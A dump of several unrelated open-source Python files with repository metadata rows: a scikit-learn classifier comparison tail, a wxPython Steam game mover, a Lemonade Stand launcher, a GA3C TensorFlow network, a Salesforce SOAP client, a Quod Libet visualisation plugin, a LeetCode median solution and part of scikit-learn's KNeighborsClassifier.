print('\nAccuracy logit:', np.round(accuracy_score(Y_test, Y_pred_logit), 3))
print("Precision logit:", np.round(precision_score(Y_test, Y_pred_logit, pos_label=1), 3))
print("Recall logit:", np.round(recall_score(Y_test, Y_pred_logit, pos_label=1), 3))
print('\n\n### LINEAR DISCRIMINANT ANALYSIS ###')
# Initiate logistic regression object
lda_clf = LinearDiscriminantAnalysis()
# Fit model. Let X_train = matrix of new_pred, Y_train = matrix of variables.
reslda_clf = lda_clf.fit(X_train, Y_train)
#Predicted values for training set
Y_pred_lda = reslda_clf.predict(X_test)
#Prior probabilities#
print("\nPrior probabilities")
print(reslda_clf.classes_)
print(reslda_clf.priors_)
#Group means#
print("\nGroup means")
#print(reslda_clf.classes_)
print(reslda_clf.means_)
#Coefficients#
print("\nCoefficients")
#print(reslda_clf.classes_)
print(reslda_clf.intercept_)
print(reslda_clf.coef_)
#Confusion matrix#
print("\nConfusion matrix LDA:")
print(confusion_matrix(Y_test, Y_pred_lda))
#Accuracy, precision and recall#
print("\nAccuracy LDA:", np.round(accuracy_score(Y_test, Y_pred_lda), 3))
print("Precision LDA:", np.round(precision_score(Y_test, Y_pred_lda, pos_label=1), 3))
print("Recall LDA:", np.round(recall_score(Y_test, Y_pred_lda, pos_label=1), 3))
print('\n\n### QUADRATIC DISCRIMINANT ANALYSIS ###')
# Initiate QDA object
qda_clf = QuadraticDiscriminantAnalysis()
# Fit model. Let X_train = matrix of new_pred, Y_train = matrix of variables.
resqda_clf = qda_clf.fit(X_train, Y_train)
#Predicted values for training set
Y_pred_qda = resqda_clf.predict(X_test)
#Prior probabilities#
print("\nPrior probabilities")
print(resqda_clf.classes_)
print(resqda_clf.priors_)
#Group means#
print("\nGroup means")
#print(resqda_clf.classes_)
print(resqda_clf.means_)
#Confusion matrix#
print("\nConfusion matrix QDA:")
print(confusion_matrix(Y_test, Y_pred_qda))
#Accuracy, precision and recall#
print("\nAccuracy QDA:", np.round(accuracy_score(Y_test, Y_pred_qda), 3))
print("Precision QDA:", np.round(precision_score(Y_test, Y_pred_qda, pos_label=1), 3))
print("Recall QDA:", np.round(recall_score(Y_test, Y_pred_qda, pos_label=1), 3))
print('\n\n### K NEAREST NEIGHBORS ###')
#K value#
kval = 15
print('\nUsing k = ' + str(kval))
# Initiate KNN object
knn_clf = KNeighborsClassifier(n_neighbors=15)
# Fit model. Let X_train = matrix of new_pred, Y_train = matrix of variables.
resknn_clf = knn_clf.fit(X_train, Y_train)
#Predicted values for training set
Y_pred_knn = resknn_clf.predict(X_test)
#Confusion matrix#
print("\nConfusion matrix KNN:")
print(confusion_matrix(Y_test, Y_pred_knn))
#Accuracy, precision and recall#
print("\nAccuracy KNN:", np.round(accuracy_score(Y_test, Y_pred_knn), 3))
print("Precision KNN:", np.round(precision_score(Y_test, Y_pred_knn, pos_label=1), 3))
print("Recall KNN:", np.round(recall_score(Y_test, Y_pred_knn, pos_label=1), 3))
#plt.show()
| gpl-3.0 | 2,730,287,095,568,599,000 | 28.756477 | 116 | 0.737768 | false |
benopotamus/steam-game-mover | main.py | 1 | 4905 | #!/usr/bin/env python
'''Allows easy moving (with symlinking) of folders to and from the SteamApps folder.
Intended for users with an SSD that cannot hold all their Steam games. Allows them to easily move games not currently being played to a slower drive easily. And then move them back at a later date. The symlinking means the games can still be played regardless of which drive they are on.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os, wx
import layout, Model
from wx.lib.pubsub import Publisher as pub
class Frame(layout.MainFrame):
'''Used wxFormBuilder to create the UI so create an instance of that and overwrite necessary methods and attributes)'''
def __init__(self, parent):
super( Frame, self ).__init__(parent)
#### The following binds/subscribes controller functions to model broadcasts ####
# These will all just take the broadcast and update the view/widgets from layout.py
pub.subscribe(self.primary_path_changed, "PRIMARY PATH CHANGED")
pub.subscribe(self.secondary_path_changed, "SECONDARY PATH CHANGED")
pub.subscribe(self.games_move_to_secondary, "GAMES MOVED TO SECONDARY")
pub.subscribe(self.games_move_to_primary, "GAMES MOVED TO PRIMARY")
pub.subscribe(self.display_move_dialog, "MOVING GAMES")
pub.subscribe(self.window_size_changed, "WINDOW SIZE CHANGED")
pub.subscribe(self.window_coords_changed, "WINDOW COORDS CHANGED")
pub.subscribe(self.use_default_window_size, "NO SIZE FOUND")
# Model is created after subscriptions because it broadcasts on instantiation (when it gets settings from config file)
self.model = Model.Model()
#### The following 'on' methods are bound to the widgets in layout.py ####
def on_games_move( self, event ):
if event.GetEventObject().GetName() == 'move_to_secondary_button':
games = self.left_listbox.GetSelectionsStrings()
self.model.move_games_to_secondary(games)
elif event.GetEventObject().GetName() == 'move_to_primary_button':
games = self.right_listbox.GetSelectionsStrings()
self.model.move_games_to_primary(games)
event.Skip()
def on_change_primary_dir_choice(self, event):
# In this case we include a "New directory" button.
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
if dlg.ShowModal() == wx.ID_OK:
self.model.change_primary_path(dlg.GetPath())
# Only destroy a dialog after we're done with it
dlg.Destroy()
def on_change_secondary_dir_choice(self, event):
# In this case we include a "New directory" button.
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
if dlg.ShowModal() == wx.ID_OK:
self.model.change_secondary_path(dlg.GetPath())
# Only destroy a dialog after we're done with it
dlg.Destroy()
def on_frame_close( self, event ):
''' Save window position and size on close'''
self.model.change_window_size(self.GetSize())
self.model.change_window_coords(self.GetPosition())
event.Skip()
#### Broadcast response methods ####
def primary_path_changed(self,message):
self.primary_dir_choice_button.SetLabel(message.data['path'])
self.left_listbox.SetItems(message.data['path_folders'])
def secondary_path_changed(self,message):
self.secondary_dir_choice_button.SetLabel(message.data['path'])
self.right_listbox.SetItems(message.data['path_folders'])
def games_move_to_secondary(self,message):
self.left_listbox.SetItems(message.data['primary_path_folders'])
self.right_listbox.SetItems(message.data['secondary_path_folders'])
# Same method for games_move_to_primary
games_move_to_primary = games_move_to_secondary
def window_size_changed(self,message):
self.SetSize(message.data)
def window_coords_changed(self,message):
self.SetPosition(message.data)
def use_default_window_size(self,message):
self.Fit()
def display_move_dialog(self, message):
'''When model broadcasts games are being moved, creates a file moving (progress) dialog'''
self.progress_dialog = layout.Moving_progress_dialog(self, message.data['initial_path'], message.data['final_path'], message.data['game_names'])
class App(wx.App):
def OnInit(self):
self.frame = Frame(parent=None)
self.frame.Show()
self.SetTopWindow(self.frame)
return True
if __name__ == '__main__':
app = App()
app.MainLoop()
| gpl-2.0 | -7,643,176,816,354,137,000 | 37.320313 | 287 | 0.733741 | false |
FOSSRIT/lemonade-stand | LemonadeStand.py | 1 | 1785 | #!/usr/bin/env python
from fortuneengine.GameEngine import GameEngine
from LemonadeMain import LemonadeMain
from LemonadeGui import LemonadeGui
from optparse import OptionParser
from pygame import font
parser = OptionParser()
parser.add_option("", "--width", dest="width", help="window width",
metavar="WIDTH", default=1200, type="int")
parser.add_option("", "--height", dest="height", help="window height",
metavar="HEIGHT", default=855, type="int")
parser.add_option("-f", "--font", dest="font", help="font size",
metavar="SIZE", default=36, type="int")
parser.add_option("", "--shopFont", dest="shopFont", help="shop font size",
metavar="SHOPSIZE", default="48", type="int")
parser.add_option("", "--shopNumFont", dest="shopNumFont",
help="shop number font size", metavar="SHOPNUMSIZE",
default="72", type="int")
parser.add_option("", "--menuFont", dest="menuFont", help="menu font",
metavar="MENUFONT", default="90", type="int")
parser.add_option("-d", "--difficulty", dest="difficulty",
help="difficulty level", metavar="DIFFICULTY",
default=0, type="int")
(opts, args) = parser.parse_args()
ge = GameEngine(width=opts.width, height=opts.height, always_draw=False)
ge.add_object('font', font.SysFont(font.get_default_font(), opts.font))
ge.add_object('shopFont', font.SysFont(font.get_default_font(), opts.shopFont))
ge.add_object('shopNumFont', font.SysFont(font.get_default_font(),
opts.shopNumFont))
ge.add_object('menuFont', font.SysFont(font.get_default_font(), opts.menuFont))
ge.add_object('main', LemonadeMain(opts.difficulty))
ge.add_object('gui', LemonadeGui())
ge.start_main_loop()
| gpl-3.0 | 6,978,417,313,381,393,000 | 39.568182 | 79 | 0.648179 | false |
andzaytsev/deepnav | GA3C/NetworkVP.py | 1 | 12801 | # Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import numpy as np
import tensorflow as tf
from Config import Config
class NetworkVP:
def __init__(self, device, model_name, num_actions):
self.device = device
self.model_name = model_name
self.num_actions = num_actions
self.img_width = Config.IMAGE_WIDTH
self.img_height = Config.IMAGE_HEIGHT
self.img_channels = Config.IMAGE_DEPTH * Config.STACKED_FRAMES
self.learning_rate = Config.LEARNING_RATE_START
self.beta = Config.BETA_START
self.log_epsilon = Config.LOG_EPSILON
self.graph = tf.Graph()
with self.graph.as_default() as g:
with tf.device(self.device):
self._create_graph()
self.sess = tf.Session(
graph=self.graph,
config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False,
gpu_options=tf.GPUOptions(allow_growth=True)))
self.sess.run(tf.global_variables_initializer())
if Config.TENSORBOARD: self._create_tensor_board()
if Config.LOAD_CHECKPOINT or Config.SAVE_MODELS:
vars = tf.global_variables()
self.saver = tf.train.Saver({var.name: var for var in vars}, max_to_keep=0)
def _create_graph(self):
self.x = tf.placeholder(
tf.float32, [None, self.img_height, self.img_width, self.img_channels], name='X')
self.y_r = tf.placeholder(tf.float32, [None], name='Yr')
self.var_beta = tf.placeholder(tf.float32, name='beta', shape=[])
self.var_learning_rate = tf.placeholder(tf.float32, name='lr', shape=[])
self.global_step = tf.Variable(0, trainable=False, name='step')
# As implemented in A3C paper
self.n1 = self.conv2d_layer(self.x, 8, 16, 'conv11', strides=[1, 4, 4, 1])
self.n2 = self.conv2d_layer(self.n1, 4, 32, 'conv12', strides=[1, 2, 2, 1])
self.action_index = tf.placeholder(tf.float32, [None, self.num_actions])
_input = self.n2
flatten_input_shape = _input.get_shape()
nb_elements = flatten_input_shape[1] * flatten_input_shape[2] * flatten_input_shape[3]
self.flat = tf.reshape(_input, shape=[-1, nb_elements._value])
self.d1 = self.dense_layer(self.flat, 256, 'dense1')
self.logits_v = tf.squeeze(self.dense_layer(self.d1, 1, 'logits_v', func=None), axis=[1])
self.cost_v = 0.5 * tf.reduce_sum(tf.square(self.y_r - self.logits_v), axis=0)
self.logits_p = self.dense_layer(self.d1, self.num_actions, 'logits_p', func=None)
if Config.USE_LOG_SOFTMAX:
self.softmax_p = tf.nn.softmax(self.logits_p)
self.log_softmax_p = tf.nn.log_softmax(self.logits_p)
self.log_selected_action_prob = tf.reduce_sum(self.log_softmax_p * self.action_index, axis=1)
self.cost_p_1 = self.log_selected_action_prob * (self.y_r - tf.stop_gradient(self.logits_v))
self.cost_p_2 = -1 * self.var_beta * \
tf.reduce_sum(self.log_softmax_p * self.softmax_p, axis=1)
else:
self.softmax_p = (tf.nn.softmax(self.logits_p) + Config.MIN_POLICY) / (1.0 + Config.MIN_POLICY * self.num_actions)
self.selected_action_prob = tf.reduce_sum(self.softmax_p * self.action_index, axis=1)
self.cost_p_1 = tf.log(tf.maximum(self.selected_action_prob, self.log_epsilon)) \
* (self.y_r - tf.stop_gradient(self.logits_v))
self.cost_p_2 = -1 * self.var_beta * \
tf.reduce_sum(tf.log(tf.maximum(self.softmax_p, self.log_epsilon)) *
self.softmax_p, axis=1)
self.cost_p_1_agg = tf.reduce_sum(self.cost_p_1, axis=0)
self.cost_p_2_agg = tf.reduce_sum(self.cost_p_2, axis=0)
self.cost_p = -(self.cost_p_1_agg + self.cost_p_2_agg)
if Config.DUAL_RMSPROP:
self.opt_p = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
self.opt_v = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
else:
self.cost_all = self.cost_p + self.cost_v
self.opt = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
if Config.USE_GRAD_CLIP:
if Config.DUAL_RMSPROP:
self.opt_grad_v = self.opt_v.compute_gradients(self.cost_v)
self.opt_grad_v_clipped = [(tf.clip_by_norm(g, Config.GRAD_CLIP_NORM),v)
for g,v in self.opt_grad_v if not g is None]
self.train_op_v = self.opt_v.apply_gradients(self.opt_grad_v_clipped)
self.opt_grad_p = self.opt_p.compute_gradients(self.cost_p)
self.opt_grad_p_clipped = [(tf.clip_by_norm(g, Config.GRAD_CLIP_NORM),v)
for g,v in self.opt_grad_p if not g is None]
self.train_op_p = self.opt_p.apply_gradients(self.opt_grad_p_clipped)
self.train_op = [self.train_op_p, self.train_op_v]
else:
self.opt_grad = self.opt.compute_gradients(self.cost_all)
self.opt_grad_clipped = [(tf.clip_by_average_norm(g, Config.GRAD_CLIP_NORM),v) for g,v in self.opt_grad]
self.train_op = self.opt.apply_gradients(self.opt_grad_clipped)
else:
if Config.DUAL_RMSPROP:
self.train_op_v = self.opt_p.minimize(self.cost_v, global_step=self.global_step)
self.train_op_p = self.opt_v.minimize(self.cost_p, global_step=self.global_step)
self.train_op = [self.train_op_p, self.train_op_v]
else:
self.train_op = self.opt.minimize(self.cost_all, global_step=self.global_step)
def _create_tensor_board(self):
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES)
summaries.append(tf.summary.scalar("Pcost_advantage", self.cost_p_1_agg))
summaries.append(tf.summary.scalar("Pcost_entropy", self.cost_p_2_agg))
summaries.append(tf.summary.scalar("Pcost", self.cost_p))
summaries.append(tf.summary.scalar("Vcost", self.cost_v))
summaries.append(tf.summary.scalar("LearningRate", self.var_learning_rate))
summaries.append(tf.summary.scalar("Beta", self.var_beta))
for var in tf.trainable_variables():
summaries.append(tf.summary.histogram("weights_%s" % var.name, var))
summaries.append(tf.summary.histogram("activation_n1", self.n1))
summaries.append(tf.summary.histogram("activation_n2", self.n2))
summaries.append(tf.summary.histogram("activation_d2", self.d1))
summaries.append(tf.summary.histogram("activation_v", self.logits_v))
summaries.append(tf.summary.histogram("activation_p", self.softmax_p))
self.summary_op = tf.summary.merge(summaries)
self.log_writer = tf.summary.FileWriter("logs/%s" % self.model_name, self.sess.graph)
def dense_layer(self, input, out_dim, name, func=tf.nn.relu):
in_dim = input.get_shape().as_list()[-1]
d = 1.0 / np.sqrt(in_dim)
with tf.variable_scope(name):
w_init = tf.random_uniform_initializer(-d, d)
b_init = tf.random_uniform_initializer(-d, d)
w = tf.get_variable('w', dtype=tf.float32, shape=[in_dim, out_dim], initializer=w_init)
b = tf.get_variable('b', shape=[out_dim], initializer=b_init)
output = tf.matmul(input, w) + b
if func is not None:
output = func(output)
return output
def conv2d_layer(self, input, filter_size, out_dim, name, strides, func=tf.nn.relu):
in_dim = input.get_shape().as_list()[-1]
d = 1.0 / np.sqrt(filter_size * filter_size * in_dim)
with tf.variable_scope(name):
w_init = tf.random_uniform_initializer(-d, d)
b_init = tf.random_uniform_initializer(-d, d)
w = tf.get_variable('w',
shape=[filter_size, filter_size, in_dim, out_dim],
dtype=tf.float32,
initializer=w_init)
b = tf.get_variable('b', shape=[out_dim], initializer=b_init)
output = tf.nn.conv2d(input, w, strides=strides, padding='SAME') + b
if func is not None:
output = func(output)
return output
def __get_base_feed_dict(self):
return {self.var_beta: self.beta, self.var_learning_rate: self.learning_rate}
def get_global_step(self):
step = self.sess.run(self.global_step)
return step
def predict_single(self, x):
return self.predict_p(x[None, :])[0]
def predict_v(self, x):
prediction = self.sess.run(self.logits_v, feed_dict={self.x: x})
return prediction
def predict_p(self, x):
prediction = self.sess.run(self.softmax_p, feed_dict={self.x: x})
return prediction
def predict_p_and_v(self, x):
return self.sess.run([self.softmax_p, self.logits_v], feed_dict={self.x: x})
def train(self, x, y_r, a, trainer_id):
feed_dict = self.__get_base_feed_dict()
feed_dict.update({self.x: x, self.y_r: y_r, self.action_index: a})
self.sess.run(self.train_op, feed_dict=feed_dict)
def log(self, x, y_r, a):
feed_dict = self.__get_base_feed_dict()
feed_dict.update({self.x: x, self.y_r: y_r, self.action_index: a})
step, summary = self.sess.run([self.global_step, self.summary_op], feed_dict=feed_dict)
self.log_writer.add_summary(summary, step)
def _checkpoint_filename(self, episode):
return 'checkpoints/%s_%08d' % (self.model_name, episode)
def _get_episode_from_filename(self, filename):
# TODO: hacky way of getting the episode. ideally episode should be stored as a TF variable
return int(re.split('/|_|\.', filename)[2])
def save(self, episode):
self.saver.save(self.sess, self._checkpoint_filename(episode))
def load(self):
filename = tf.train.latest_checkpoint(os.path.dirname(self._checkpoint_filename(episode=0)))
if Config.LOAD_EPISODE > 0:
filename = self._checkpoint_filename(Config.LOAD_EPISODE)
self.saver.restore(self.sess, filename)
return self._get_episode_from_filename(filename)
def get_variables_names(self):
return [var.name for var in self.graph.get_collection('trainable_variables')]
def get_variable_value(self, name):
return self.sess.run(self.graph.get_tensor_by_name(name))
| gpl-2.0 | -4,183,307,470,993,491,500 | 46.94382 | 126 | 0.611515 | false |
heroku/python-salesforce-client | salesforce/soap/base.py | 1 | 5676 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import logging
import urlparse
logger = logging.getLogger(__name__)
try:
import suds.client
if suds.__version__ < '0.6':
raise ImportError
except ImportError:
logger.error("The metadata API requires suds-jurko >= 0.6")
exit()
from requests import Session
from requests.adapters import BaseAdapter
from requests.auth import HTTPBasicAuth
from requests.models import Response
from suds import WebFault
from suds.client import Client
from suds.plugin import MessagePlugin
from suds.properties import Unskin
from suds.transport import Transport, TransportError, Reply
class FileAdapter(BaseAdapter):
def send(self, request, **kwargs):
response = Response()
response.headers = {}
response.encoding = 'utf-8' # FIXME: this is a complete guess
response.url = request.url
response.request = request
response.connection = self
try:
response.raw = open(request.url.replace('file://', ''), 'r')
except IOError as e:
response.status_code = 404
return response
response.status_code = 200
return response
def close(self):
pass
class RequestsHttpTransport(Transport):
def __init__(self, session=None, **kwargs):
Transport.__init__(self)
Unskin(self.options).update(kwargs)
self.session = session or Session()
# Suds expects support for local files URIs.
self.session.mount('file://', FileAdapter())
def _call(self, request, method):
headers = dict(self.options.headers)
headers.update(request.headers)
if self.options.username and self.options.password:
auth = HTTPBasicAuth(self.options.username, self.options.password)
else:
auth = None
response = getattr(self.session, method)(request.url,
auth=auth,
data=request.message,
headers=headers,
timeout=self.options.timeout,
proxies=self.options.proxy,
stream=True)
return response
def open(self, request):
return self._call(request, 'get').raw
def send(self, request):
response = self._call(request, 'post')
return Reply(response.status_code, response.headers, response.content)
class SalesforceSoapClientBase(object):
@property
def version(self):
raise NotImplementedError('Subclasses must specify a version.')
@property
def wsdl_path(self):
raise NotImplementedError('Subclasses must specify a wsdl path.')
def __init__(self, client_id, client_secret, domain, access_token,
refresh_token=None, token_updater=None):
# This plugin is needed in order to keep empty complex objects from
# getting sent in the soap paylaod.
class PrunePlugin(MessagePlugin):
def marshalled(self, context):
context.envelope[1].prune()
wsdl = 'file://{0}'.format(self.wsdl_path)
self.client = Client(wsdl, transport=RequestsHttpTransport(),
plugins=[PrunePlugin()])
self._set_session_header(access_token)
endpoint = 'https://{0}/services/Soap/m/{1}/{2}'.format(
domain,
self.version,
access_token.split('!', 1)[0], # Salesforce org ID
)
self.client.set_options(location=endpoint)
if refresh_token is not None:
from ..rest import SalesforceRestClient
self.rest_client = SalesforceRestClient(client_id, client_secret,
domain,
access_token=access_token,
refresh_token=refresh_token,
token_updater=token_updater)
else:
self.rest_client = None
@staticmethod
def login(wsdl_path, username, password, token):
client = Client('file://{0}'.format(wsdl_path))
response = client.service.login(username, password + token)
return (
response.sessionId,
urlparse.urlparse(response.serverUrl).netloc,
)
def _set_session_header(self, access_token):
session_header = self.client.factory.create('SessionHeader')
session_header.sessionId = access_token
headers = {
'SessionHeader': session_header
}
self.client.set_options(soapheaders=headers)
def _call(self, function_name, args=None, kwargs=None):
args = args or []
kwargs = kwargs or {}
func = getattr(self.client.service, function_name)
# TODO: parse response, return something actually useful
try:
return func(*args, **kwargs)
except WebFault as e:
# Detect whether the failure is due to an invalid session, and if
# possible, try to refresh the access token.
if (hasattr(e, 'fault') and
e.fault.faultcode == 'sf:INVALID_SESSION_ID' and
self.rest_client):
token = self.rest_client._refresh_token()
if token:
self._set_session_header(token['access_token'])
return func(*args, **kwargs)
raise
| mit | 1,096,312,723,674,942,000 | 34.037037 | 80 | 0.570825 | false |
elbeardmorez/quodlibet | quodlibet/quodlibet/ext/events/visualisations.py | 1 | 3329 | # -*- coding: utf-8 -*-
# Copyright 2017 Nick Boultbee
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import os
import signal
from gi.repository import Gtk
from quodlibet import _
from quodlibet import app
from quodlibet import print_d
from quodlibet import print_w
from quodlibet.plugins import PluginConfig
from quodlibet.plugins.events import EventPlugin
from quodlibet.qltk import Button
from quodlibet.qltk import ErrorMessage
from quodlibet.qltk import Icons
from quodlibet.qltk.entry import UndoEntry
from quodlibet.util import escape
class ProjectM(EventPlugin):
"""Launch external visualisations, e.g. via projectM
Try this first (Ubuntu/Debian):
sudo apt-get install projectm-pulseaudio
"""
_config = PluginConfig(__name__)
PLUGIN_ID = "visualisations"
PLUGIN_NAME = _("Launch Visualisations")
PLUGIN_ICON = Icons.IMAGE_X_GENERIC
PLUGIN_DESC = _("Launch external visualisations.")
DEFAULT_EXEC = 'projectM-pulseaudio'
def __init__(self):
self._pid = None
def enabled(self):
from gi.repository import GLib
print_d("Starting %s" % self.PLUGIN_NAME)
try:
self._pid, fdin, fdout, fderr = GLib.spawn_async(
argv=self.executable.split(),
flags=GLib.SpawnFlags.SEARCH_PATH,
standard_output=True,
standard_input=True)
except GLib.Error as e:
msg = ((_("Couldn't run visualisations using '%s'") + " (%s)") %
(escape(self.executable), escape(e.message)))
ErrorMessage(title=_("Error"), description=msg,
parent=app.window).run()
else:
# self._stdin = os.fdopen(fdin, mode='w')
print_d("Launched with PID: %s" % self._pid)
def disabled(self):
if not self._pid:
return
print_d("Shutting down %s" % self.PLUGIN_NAME)
try:
os.kill(self._pid, signal.SIGTERM)
os.kill(self._pid, signal.SIGKILL)
except Exception as e:
print_w("Couldn't shut down cleanly (%s)" % e)
def PluginPreferences(self, *args):
vbox = Gtk.VBox(spacing=12)
label = Gtk.Label(label=_("Visualiser executable:"))
def edited(widget):
self.executable = widget.get_text()
entry = UndoEntry()
entry.connect('changed', edited)
entry.set_text(self.executable)
hbox = Gtk.HBox(spacing=6)
hbox.pack_start(label, False, False, 0)
hbox.pack_start(entry, True, True, 0)
vbox.pack_start(hbox, True, True, 0)
def refresh_clicked(widget):
self.disabled()
self.enabled()
refresh_button = Button(_("Reload"), Icons.VIEW_REFRESH)
refresh_button.connect('clicked', refresh_clicked)
vbox.pack_start(refresh_button, False, False, 0)
return vbox
@property
def executable(self):
return self._config.get('executable', self.DEFAULT_EXEC)
@executable.setter
def executable(self, value):
self._config.set('executable', value)
| gpl-2.0 | -5,147,228,131,064,625,000 | 31.320388 | 76 | 0.625713 | false |
daicang/Leetcode-solutions | 004-median-of-two-sorted-arrays.py | 1 | 1417 | #!/usr/bin/python
class Solution(object):
def findMedianSortedArrays(self, nums1, nums2):
size = len(nums1) + len(nums2)
if size % 2 == 0:
return (self.getk(nums1[:], nums2[:], size/2)+
self.getk(nums1[:], nums2[:], size/2-1))/2.0
else:
return self.getk(nums1[:], nums2[:], size/2)
def getk(self, a, b, k):
if len(a) > len(b): a, b = b, a
if len(a) <= 2:
b.extend(a)
b.sort()
return b[k]
if not a: return b[k]
if k <= 0: return min(a[0], b[0])
m, n = len(a), len(b)
if (m+n)/2 >= k:
if a[m/2] >= b[n/2]:
return self.getk(a[:m/2+1], b, k)
else:
return self.getk(a, b[:n/2+1], k)
else:
if a[m/2] >= b[n/2]:
return self.getk(a, b[n/2:], k - n/2)
else:
return self.getk(a[m/2:], b, k - m/2)
# def myfunc(a, b, c):
# return a, b, c
# print myfunc(1, 2, 4/3)
a = [1, 2, 3, 4, 5]
b = [3, 5, 6, 7]
c = []
d = [1]
e = [2, 3, 4, 5, 7, 8, 9, 10, 11, 13, 17, 54, 83]
f = [1, 6, 9, 22, 45, 103, 255, 1024]
g = [1, 2, 2]
h = [1, 2, 3]
s = Solution()
print s.findMedianSortedArrays(a, b)
print s.findMedianSortedArrays(c, d)
print s.findMedianSortedArrays(e, f)
print s.findMedianSortedArrays(g, h)
| mit | -7,180,720,171,993,316,000 | 27.918367 | 64 | 0.440367 | false |
bnaul/scikit-learn | sklearn/neighbors/_classification.py | 2 | 23284 | """Nearest Neighbor Classification"""
# Authors: Jake Vanderplas <[email protected]>
# Fabian Pedregosa <[email protected]>
# Alexandre Gramfort <[email protected]>
# Sparseness support by Lars Buitinck
# Multi-output support by Arnaud Joly <[email protected]>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import numpy as np
from scipy import stats
from ..utils.extmath import weighted_mode
from ..utils.validation import _is_arraylike, _num_samples
import warnings
from ._base import _check_weights, _get_weights
from ._base import NeighborsBase, KNeighborsMixin, RadiusNeighborsMixin
from ..base import ClassifierMixin
from ..utils import check_array
from ..utils.validation import _deprecate_positional_args
class KNeighborsClassifier(KNeighborsMixin,
ClassifierMixin,
NeighborsBase):
"""Classifier implementing the k-nearest neighbors vote.
Read more in the :ref:`User Guide <classification>`.
Parameters
----------
n_neighbors : int, default=5
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : {'uniform', 'distance'} or callable, default='uniform'
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
p : int, default=2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric : str or callable, default='minkowski'
the distance metric to use for the tree. The default metric is
minkowski, and with p=2 is equivalent to the standard Euclidean
metric. See the documentation of :class:`DistanceMetric` for a
list of available metrics.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit. X may be a :term:`sparse graph`,
in which case only "nonzero" elements may be considered neighbors.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Doesn't affect :meth:`fit` method.
Attributes
----------
classes_ : array of shape (n_classes,)
Class labels known to the classifier
effective_metric_ : str or callble
The distance metric used. It will be same as the `metric` parameter
or a synonym of it, e.g. 'euclidean' if the `metric` parameter set to
'minkowski' and `p` parameter set to 2.
effective_metric_params_ : dict
Additional keyword arguments for the metric function. For most metrics
will be same with `metric_params` parameter, but may also contain the
`p` parameter value if the `effective_metric_` attribute is set to
'minkowski'.
n_samples_fit_ : int
Number of samples in the fitted data.
outputs_2d_ : bool
False when `y`'s shape is (n_samples, ) or (n_samples, 1) during fit
otherwise True.
Examples
--------
